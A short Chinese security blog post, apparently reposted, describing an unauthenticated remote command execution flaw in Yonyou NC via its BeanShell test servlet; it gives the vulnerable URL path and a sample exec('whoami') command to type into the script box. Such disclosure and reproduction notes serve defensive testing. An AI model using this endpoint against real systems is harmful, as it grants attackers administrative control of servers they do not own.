暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

用友bsh.servlet.BshServlet命令执行

安全小工坊 2021-06-03
2298

漏洞简介

nc存在一个未授权的页面,在无需登陆系统的情况下,攻击者可通过BeanShell测试接口直接执行任意命令,恶意攻击者成功利用该漏洞可获得目标系统管理权限。

漏洞复现

漏洞地址

http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet

在Script框输入要执行的命令,点击Evaluate即可

exec("whoami")

漏洞检测


文章转载自安全小工坊,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论